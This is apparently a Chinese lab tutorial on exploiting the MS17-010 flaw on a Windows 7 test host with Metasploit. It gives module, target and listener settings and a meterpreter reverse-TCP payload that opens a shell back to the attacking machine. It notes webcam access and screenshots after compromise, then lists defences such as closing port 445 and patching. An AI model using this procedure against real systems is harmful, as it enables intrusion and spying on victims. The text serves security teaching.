靶機:windows7 x64? IP:192.168.1.5
攻擊機:Kali Rolling (2019.3) x64 IP:192.168.1.3
兩臺主機在同壹網段內;win7關閉防火墻並且開啟445端口。
1、使用ipconfig/ifconfig分別查看win7和kali的ip。
2、打開msf工具
每次開啟都會有不同的界面
3、使用search命令搜索ms17_010
4、選擇模塊和設置條件
使用use來選擇第三個模塊,可以直接 use 2,也可以打全
然後用set來設置靶機IP set rhost 192.168.1.5
設置本機IP set lhost 192.168.1.3
設置監聽端口 set lport 8888 不設置則默認4444端口
設置payload set payload windows/x64/meterpreter/reverse_tcp
還有另外壹個payload能用於本實驗,具體可以 show payloads 查看
最後,可以使用show options檢查所有信息
5、開始滲透 run
稍等片刻 看到win則成功創建會話
6、成功之後,可以開啟Windows7的攝像頭,截圖等等
具體可以用help查看
1、關閉445端口
2、打開防火墻,安裝安全軟件
3、安裝對應補丁,這裏就不放鏈接了
關閉445端口的方法:
1)打開控制面板----Windows防火墻----高級設置
2)點擊新建規則,設置端口號的規則並且命名(如圖)
msf工具雖然強大,但只能用於已知的並且已提交模塊的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻擊。而不是簡單的使用工具use和set。